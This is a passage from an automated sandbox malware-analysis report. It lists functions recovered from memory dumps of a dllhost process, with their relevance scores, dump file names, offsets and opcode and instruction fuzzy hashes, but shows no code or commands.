Function 04BC08B8 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

E, xrefs: 04BC08D0

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: ee3212d38a074348ba5e842b89a45c112bb3635cbc94808e11f9941f96b8b180
Instruction ID: 247d80489206d42f2e5817a4b8d7e1cb4d97c6566e2fa4628bf652ab7991e30f
Opcode Fuzzy Hash: ee3212d38a074348ba5e842b89a45c112bb3635cbc94808e11f9941f96b8b180
Instruction Fuzzy Hash: 2FC08C70A01108CBEB40AFA4881879C76B1AB40300F8080684006E7380EE7C09008F11

Function 04BC0436 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

), xrefs: 04BC044E

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 4a715ed2cbb82f961fd06dac2cfc27addd10f8ecd2ba27a0b283a38c97da0182
Instruction ID: 3c76c7e3638ec9e45a045d34ec83f1dfc9d7bba08790ce7859e64acecf64cd13
Opcode Fuzzy Hash: 4a715ed2cbb82f961fd06dac2cfc27addd10f8ecd2ba27a0b283a38c97da0182
Instruction Fuzzy Hash: 51C04C70E05249CBEB44AFB4852879C76E5AB55305F80456D9006AA385EA7919044F51

Function 04BC03AF Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

h, xrefs: 04BC03C4

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 4866943553c659c97678032ce98116614b6f9d61599505b0bd3083290401f2b2
Instruction ID: 45b38e48813749679d1d044a99b42b449a82b89ff3fc4ea90622f227dade4878
Opcode Fuzzy Hash: 4866943553c659c97678032ce98116614b6f9d61599505b0bd3083290401f2b2
Instruction Fuzzy Hash: BFC04C70A05249CBDF44AFF485583AC76A5AF55305F90462D5002A7385EF7918149B41

Function 04BC08DC Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

L, xrefs: 04BC08F4

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 1930c2e166f6468b496c096d85b097dbad727499d3f9bd78b0eceeec5d3fcfb1
Instruction ID: 68ceb1b476e900be8d6daab571fbb3e8faa59b8e8c1f21444f0ba16f59cf3be1
Opcode Fuzzy Hash: 1930c2e166f6468b496c096d85b097dbad727499d3f9bd78b0eceeec5d3fcfb1
Instruction Fuzzy Hash: 64C04C70A46149CBEB44AFB4851879C76A5AB55304F90446D950AA6385EA7C1A048B45

Function 04BC0415 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

\, xrefs: 04BC042A

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: d159369d1065b1034c0d6fe20c0f8ece91cad80b2342df153245b596c180bf33
Instruction ID: cac5da50dc23e6659534131c8eccff4d6caf60f6b147012f2cd7e21969d6c4ae
Opcode Fuzzy Hash: d159369d1065b1034c0d6fe20c0f8ece91cad80b2342df153245b596c180bf33
Instruction Fuzzy Hash: DFC04C74E05249CBEB54AFF4852879CB6A1AB55305F90842D9512A7385EA7814044F41

Function 04BC04C9 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

[, xrefs: 04BC04DE

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 7a441002ef7d33cfad765fc4be87d90164da5116838817005265f256af55fa3c
Instruction ID: dd14854e88a3a2ced0e706590bb00edc95a8a5a1de6d1c1a06c5c3abdefbed10
Opcode Fuzzy Hash: 7a441002ef7d33cfad765fc4be87d90164da5116838817005265f256af55fa3c
Instruction Fuzzy Hash: BAC04C70A05249CBEB44AFE4851879D76A5AB55345F8084299506EB384EA781504CF41

Function 04BC0500 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

;, xrefs: 04BC0515

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 7d62e731038bbfb9f87ffa15185a5a91c7bfaa66dcd0b0c4eaa968d31a00999c
Instruction ID: 2df7803ebd1142f8b8ca66c3e7ad53b7944769c5460aa0466f89f148f0f0839d
Opcode Fuzzy Hash: 7d62e731038bbfb9f87ffa15185a5a91c7bfaa66dcd0b0c4eaa968d31a00999c
Instruction Fuzzy Hash: 48C04C70A06149CBDB44AFF4811839D76A5AB55744F90452D5502A7385EA791A14CB41

Function 04BC0340 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

6, xrefs: 04BC0358

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: 50911893d7d3bfbb2b01bf560bf0522ebdf6d000cf62d93127c6241df2ba8c44
Instruction ID: 63fc2c407d284c856815b4f8d363d86276cf0e6598f26f0c50f7922adebe19fc
Opcode Fuzzy Hash: 50911893d7d3bfbb2b01bf560bf0522ebdf6d000cf62d93127c6241df2ba8c44
Instruction Fuzzy Hash: 8DC08C30A02108CBDB80AFF4801839C76E0AB42300F808068800AA6380EE3809048B41

Function 0484F298 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 606481b7171a2537dbaabe8796fcb67734cbcd2774c14133976941d2f66eb094
Instruction ID: 670c342bc379c6d80c912f4d25076866bd8aa9fc07a44eda68121cf0831868aa
Opcode Fuzzy Hash: 606481b7171a2537dbaabe8796fcb67734cbcd2774c14133976941d2f66eb094
Instruction Fuzzy Hash: 5B21CC74A0424ADBEB10EFA8E90826EB7F1FF80309F908569D705D7254EB749A04DB52

Function 008705DF Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2772288524.0000000000870000.00000040.00000020.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_870000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f979343d8598885010906a3ef07102b70ff4cfc9953a0d25a42457d7abb8bbe
Instruction ID: 6a4d981d2d0424a28a788afc1c95a544dba714e0d516dfe1a2d7dc07fd96b582
Opcode Fuzzy Hash: 3f979343d8598885010906a3ef07102b70ff4cfc9953a0d25a42457d7abb8bbe
Instruction Fuzzy Hash: B101D6B65093805FD7028F169C418A3FFE8EA8A620709C09BEC4D9B612D125A909CB72

Function 04840007 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961dc3ff2a8b0258944eadd0e49baf9b108557a734fd069e6abf618fc4b5ebed
Instruction ID: d32d00e7b58e3552eea0b15ad437717d0b5d3db81324151e808aca5267fa8c77
Opcode Fuzzy Hash: 961dc3ff2a8b0258944eadd0e49baf9b108557a734fd069e6abf618fc4b5ebed
Instruction Fuzzy Hash: 7601486004E7C58FC30397B45820A857FB46E47698B5E49EBC4C0CF1A3D218995ED723

Function 04846D38 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9080cae6f7d3a53e719f9c631d46c5f1ca8c265c645b1c260c05283fe89b701
Instruction ID: e3ab18b38259845247fc9524236285db915a06b76a31cd6bcfdf83aa955dbf11
Opcode Fuzzy Hash: a9080cae6f7d3a53e719f9c631d46c5f1ca8c265c645b1c260c05283fe89b701
Instruction Fuzzy Hash: 1BF08230648348AFC7124B68A8093A57FA8EB87F15F0005D5D941CB3A2EF766E189362

Function 0484206F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f991e16ee8c29c3628884d654c126a81b0f575c02b8c846eb71ff6ddd2c152
Instruction ID: 4b895fa8d057e93af2772028d82a02e5654a66e4a4836ece13b2734285ade4c2
Opcode Fuzzy Hash: 27f991e16ee8c29c3628884d654c126a81b0f575c02b8c846eb71ff6ddd2c152
Instruction Fuzzy Hash: E5F08C74A08219CBDB489F28DC9436CB7A1BBC4701F0088A5E906D3350DE745E80CF41

Function 04841704 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730a5924c75b8a76baa6ce4952a718cd9ba15b7ff8477076cd9266195c8f9209
Instruction ID: bea15b549ef5bd8d7f64dd5dac8177272c1a52488e689b3a709d66c6018e8d39
Opcode Fuzzy Hash: 730a5924c75b8a76baa6ce4952a718cd9ba15b7ff8477076cd9266195c8f9209
Instruction Fuzzy Hash: C9F01DB8B05219CBDB548F38DD587ADB7B1BBC9740F0488A5E90AE2290DF749E44CF40

Function 00870606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2772288524.0000000000870000.00000040.00000020.00020000.00000000.sdmp, Offset: 00870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_870000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 367eaa890c24a9639252263856d001bb34a68f0e85a647d63de4ab5b9940c894
Instruction ID: 46dca4fd6ae1f1a79074cb2ca5e6acbb6140b22daa82a97cf256a3a7a90d1c92
Opcode Fuzzy Hash: 367eaa890c24a9639252263856d001bb34a68f0e85a647d63de4ab5b9940c894
Instruction Fuzzy Hash: FEE092B66046008B9650DF0BEC81492FBD8EB88630B08C07FDD0D8B701D275B504CAA5

Function 04846A88 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be66b77eff213c8a39309034a5ccd2ab93ddbbcb744e63ebb2123f8653217cd
Instruction ID: 7c317d07ee3e935b1d053272f447b455587ff0903bdc67c771bde6806ba3f5e6
Opcode Fuzzy Hash: 0be66b77eff213c8a39309034a5ccd2ab93ddbbcb744e63ebb2123f8653217cd
Instruction Fuzzy Hash: F9E0927108E7C89FC3030B24A8104913F78AE53A1130609D7E1888F273EB325C69D361

Function 048415D9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7d14579c34a1979e9d2c684d5a8cf9c3ff3eae1868c08d67d541b470db8990
Instruction ID: f655d9759f83033273198b8922b94a99d38017ad7e323972ff4d89bbf2781c70
Opcode Fuzzy Hash: ed7d14579c34a1979e9d2c684d5a8cf9c3ff3eae1868c08d67d541b470db8990
Instruction Fuzzy Hash: 8D013EB4D0022DDFCB64CF18CD84BD9B7B5BB89205F0085EA964DA2211EB316E85DF59

Function 04846D48 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e88821c1dd110eca67ff80b41470fa424d768586e1edf8fa508acd9417e9d860
Instruction ID: 8ae9d4a585f79fa2dec3f02710b069b433e581fe20e955570cb0082dd05ac216
Opcode Fuzzy Hash: e88821c1dd110eca67ff80b41470fa424d768586e1edf8fa508acd9417e9d860
Instruction Fuzzy Hash: 5CF09B30B0420CDBDB25A7B8A91D3697799FBC5B15F004568D902C7391FF7A6E488752

Function 04843A05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f650068f9a100082615edf1671832bfe3a92869e337d0ca56a4b0bd70aa789ca
Instruction ID: e53e1403b5b43ff185908b9cd5f61525b7f7dc80d4d533605014fb79e37ba885
Opcode Fuzzy Hash: f650068f9a100082615edf1671832bfe3a92869e337d0ca56a4b0bd70aa789ca
Instruction Fuzzy Hash: 70E08C35708568CBE7409B1C850435C36E0AB8A394F088AE6FA06DB382D7399D408B97

Function 04842E1A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 802a635743e418b5f770f7390de96f6eff51a083e08694ed178d3532b57a0e87
Instruction ID: 8a375647392a8f99de4d918d5fd8b130fb71bd653a282e77b8b6cbca67b3e476
Opcode Fuzzy Hash: 802a635743e418b5f770f7390de96f6eff51a083e08694ed178d3532b57a0e87
Instruction Fuzzy Hash: C0E08675A08215DFEB105F68D81476D77A4BB84750F0448B5B849D3340D6385E40CF62

Function 008623F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2771217034.0000000000862000.00000040.00000800.00020000.00000000.sdmp, Offset: 00862000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_862000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07caf9994815b8ce0418696b3e385787f2b8aaa43af6054ac3da174fb3d4bc0d
Instruction ID: 0982ef5d83814f53b6ce96318a55cf2216a526fcba2a00a78c4db61666b8e27b
Opcode Fuzzy Hash: 07caf9994815b8ce0418696b3e385787f2b8aaa43af6054ac3da174fb3d4bc0d
Instruction Fuzzy Hash: 34D05E79209A818FE716DA1CC1A8BA537D4FF51714F4B44F9A840CB763CB68D9C1D600

Function 008623BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2771217034.0000000000862000.00000040.00000800.00020000.00000000.sdmp, Offset: 00862000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_862000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4990f6c71816eccd6cde71d4afbadc2d205ea2b0a7537923a85657ace34b3337
Instruction ID: dd3e80be94818c729f316a6d36d707b45957444a1fa83ace6ea68e731a792f6b
Opcode Fuzzy Hash: 4990f6c71816eccd6cde71d4afbadc2d205ea2b0a7537923a85657ace34b3337
Instruction Fuzzy Hash: 4CD05E346056814BDB15DB0CD2D4F5933D4BB44714F0744E9AC10CB372C7A8D8C0CA00

Function 04846CD8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 389056213e249cfe5e9f2a200ab3d93e55702bbb6a4dc2da956611900f9e8abd
Instruction ID: 9005e6519bb25c9e0fc38c3b4aebabe5ef9331b4443b6f03c5802f55ed68b749
Opcode Fuzzy Hash: 389056213e249cfe5e9f2a200ab3d93e55702bbb6a4dc2da956611900f9e8abd
Instruction Fuzzy Hash: 8BD0122008BB84AFC3032B2C9C024813FB8EE47A4138908C2D080CF232CD2A2C0983BB

Function 0484110B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66203648812c9c21e5dff51a2529c8e24ecbe3d0e84ebb91d4882c5400d810d4
Instruction ID: d24233a97b69f5decaa28011b958475c9ac0ae76d4d5e8348240cb9dfa220003
Opcode Fuzzy Hash: 66203648812c9c21e5dff51a2529c8e24ecbe3d0e84ebb91d4882c5400d810d4
Instruction Fuzzy Hash: 3DD05E78A0C218D7E7104F14EC183ACB660BB81790F0049A0F909C2180DBB9AE40CF81

Function 04846998 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e02a4f47d274e9060919d729c250f435cfa512ea6b020ad1a3c2335a7241a3
Instruction ID: afbe741dc5992864acd9732b5bef0cffae6d4f843057a3fd6a2d71a5aa0ee13d
Opcode Fuzzy Hash: 28e02a4f47d274e9060919d729c250f435cfa512ea6b020ad1a3c2335a7241a3
Instruction Fuzzy Hash: 8AD0C930049680CFD3016B2490185803BB1AF0A20570548E6D088CF132C7211806D701

Function 04BC0DF9 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7281feb9d75409153699c951cad9fdce0363057035fd9641400da0b5b896e4e7
Instruction ID: ff28f599e56c7cbcf98e65c6269260dd693b31698937f57cfaf55a9ae456b726
Opcode Fuzzy Hash: 7281feb9d75409153699c951cad9fdce0363057035fd9641400da0b5b896e4e7
Instruction Fuzzy Hash: E3C048526DF3C50ECB1303B028E40D4AF2448B35193292AEBE08A8A1E2E91A4A568712

Function 04846C39 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382868584bb3d85cfa1982eb2d64d886bd8876a75aad07bf1b64b75d10c86563
Instruction ID: 8fe08e4bac689a002d2f3689ae39b636d9c898083b7d38469a3517f8cc59bdb6
Opcode Fuzzy Hash: 382868584bb3d85cfa1982eb2d64d886bd8876a75aad07bf1b64b75d10c86563
Instruction Fuzzy Hash: 55C0486985F7C0AFEB13977418A9946BFBA2E0741834B48CFC08C9F463DA19185EC762

Function 04BC057C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4260b3e62713acd182b02bcde02262938f0e5e0b5ad3ab7d8c7d683311ba1164
Instruction ID: 51d99b839d25918f5608b9260450fc7b9d2f842e31190082e4155f378aaa656c
Opcode Fuzzy Hash: 4260b3e62713acd182b02bcde02262938f0e5e0b5ad3ab7d8c7d683311ba1164
Instruction Fuzzy Hash: 82C08C30E09208CBEB40AFF4801839C7AA0AB44300F90402C8002A7380EE3C18048B41

Function 04BC098D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee94837b4b23b124df09f1a1253719c276ff14e12c889fb849eedc79c1b07d6
Instruction ID: 49a2ab87d2c946d58356247c3ad5a48a7bee0fb803a38cc9778a122ad8d8dc8c
Opcode Fuzzy Hash: bee94837b4b23b124df09f1a1253719c276ff14e12c889fb849eedc79c1b07d6
Instruction Fuzzy Hash: 49C04C70E05249CBEB44AFE4C15839C7AA1AB55304F9044299006AB384EA7D1444C741

Function 0484F250 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e01e6283f110d899050b6d91856b01fac544b4c594f05e30c01b7e840cf88ad1
Instruction ID: 0ca9454c7243953b4e8c8e84208a54a141a570e0e8c9fa4162bfbba784800161
Opcode Fuzzy Hash: e01e6283f110d899050b6d91856b01fac544b4c594f05e30c01b7e840cf88ad1
Instruction Fuzzy Hash: 9BB0123104130949C7301170A401220320C4F4150AE1000F9550C05B02D93AA0404049

Function 048469A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction ID: ce9f0d320568e7aeddd1da0d443e20918fc001d358bb9c195afdc7c1ad0b123c
Opcode Fuzzy Hash: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction Fuzzy Hash: 32A011300002088BC200ABA8E008EA033ECAB08A08F0000F0A20C8BA228A22B8008A82

Function 0484A2A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40443110b0f3d7501e93610cd33cdae1a96f8da79bb1405471e2153a539ed714
Instruction ID: 837a97d6ebd04d97772c30718aeb3e051da644ac4a35bccbfc08c0146fdb3c9b
Opcode Fuzzy Hash: 40443110b0f3d7501e93610cd33cdae1a96f8da79bb1405471e2153a539ed714
Instruction Fuzzy Hash: A0A02230000A0C8B828033EC380A28EBB0CACC20083800020A00C800022FAAB8008AA3

Function 04846AE0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49aa4bf79cf363648d467bc4076c134cec253beb24bba79472d06a32ecfffeaf
Instruction ID: 7a37bd59c523511826c5d1c55078843e9b1dcd39b295030e9dd2ce83600917bf
Opcode Fuzzy Hash: 49aa4bf79cf363648d467bc4076c134cec253beb24bba79472d06a32ecfffeaf
Instruction Fuzzy Hash: D4A02232082B0C83C20022B02000030B38C8A0200C3E200B8830C08F202AB3F0A0808C

Function 0484F758 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01281a83952374f01289a3157809b5f3a9a27f352e551f87e5a467ba4cb7e175
Instruction ID: 9f298da58c252dbc3072962d7ff01bcfe03185eda77c8a410282eaeed15df0b9
Opcode Fuzzy Hash: 01281a83952374f01289a3157809b5f3a9a27f352e551f87e5a467ba4cb7e175
Instruction Fuzzy Hash: 02A0021168C30C22D44022D67802B55765C4B92A69E814061E60D0AE911982745410EE

Function 04BC0E08 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2931380947.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c168adda64cee662b231975772461a8d69b75cc9b8eb7ecd405031902baedd
Instruction ID: 561036fe7af1ca5b89911b14e33b34be8dcf07ffa9ca6489a158acbc6734831c
Opcode Fuzzy Hash: 93c168adda64cee662b231975772461a8d69b75cc9b8eb7ecd405031902baedd
Instruction Fuzzy Hash:

Function 0484E018 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb4795d67d103ef36568dc8300ba7ceeb5414a972b6359f5334f37c2c981f84
Instruction ID: 5ce6d8944aaf6d50185257d1a028fd4490a87da039e195b91be087485651da67
Opcode Fuzzy Hash: 5cb4795d67d103ef36568dc8300ba7ceeb5414a972b6359f5334f37c2c981f84
Instruction Fuzzy Hash: 3390027114460C8F45802799B909555B75CA5449157800061A50D415125E6565104795

Function 0484F840 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc13b7408798003484d2118497c55230ec7ad3f6f232405e8e7af18ecff9799b
Instruction ID: 2750d2a667c22864fcb631b9a9c2016866c9b6878674cfcb6a828f52c178f59a
Opcode Fuzzy Hash: fc13b7408798003484d2118497c55230ec7ad3f6f232405e8e7af18ecff9799b
Instruction Fuzzy Hash:

Function 04846C48 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000029.00000002.2911167789.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
